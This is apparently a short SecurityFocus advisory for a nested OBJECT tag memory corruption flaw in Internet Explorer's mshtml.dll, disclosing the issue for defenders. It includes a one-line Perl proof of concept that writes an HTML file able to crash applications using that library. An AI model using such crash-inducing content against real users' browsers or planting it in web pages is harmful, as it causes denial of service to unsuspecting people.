Microsoft Internet Explorer Nested OBJECT Tag Memory Corruption Vulnerability

The following command generates HTML content sufficient to crash applications that use 'mshtml.dll':

perl -e '{print "<STYLE></STYLE>\n<OBJECT>\nBork\n"x32}' >test.html

The referenced proof-of-concept HTML content is sufficient to demonstrate this issue with several differing results.

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com


 

Privacy Statement
Copyright 2010, SecurityFocus